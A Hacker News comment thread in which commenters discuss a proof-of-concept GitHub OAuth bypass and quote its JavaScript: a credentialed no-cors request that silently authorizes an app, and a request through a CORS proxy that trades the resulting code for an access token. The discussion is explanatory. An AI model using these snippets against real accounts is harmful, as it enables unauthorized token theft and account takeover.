Hacker News new | past | comments | ask | show | jobs | submit login

That would defeat the point because then the server would need to know your authentication cookie. I can’t see the PoC but I doubt this is how it works.



There was no proxy view-source:https://not-an-aardvark.github.io/oauth-bypass-poc-fbdf56605...

  const authUrl = `https://github.com/login/oauth/authorize? 
  client_id=${CLIENT_ID}&scope=read:user&authorize=1`;
    fetch(
      authUrl,
      {
        method: 'HEAD',
        credentials: 'include',
        mode: 'no-cors'
      }
    )


There was a proxy, but I may have misunderstood what it was being used for

    fetch(
        // For the proof-of-concept, use a proxy to get around CORS. This is only necessary because the proof of concept runs
        // clientside in a browser; an alternative would be to just send the code to a server and do the request there.
        'https://cors-anywhere.herokuapp.com/https://github.com/login/oauth/access_token',
        {
        method: 'POST',
        mode: 'cors',
        headers: {
            Accept: 'application/json',
            'Content-Type': 'application/json'
        },
        body: JSON.stringify({
            client_id: CLIENT_ID,
            client_secret: CLIENT_SECRET,
            code
        })
        }
    )




Consider applying for YC's Spring batch! Applications are open till Feb 11.

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: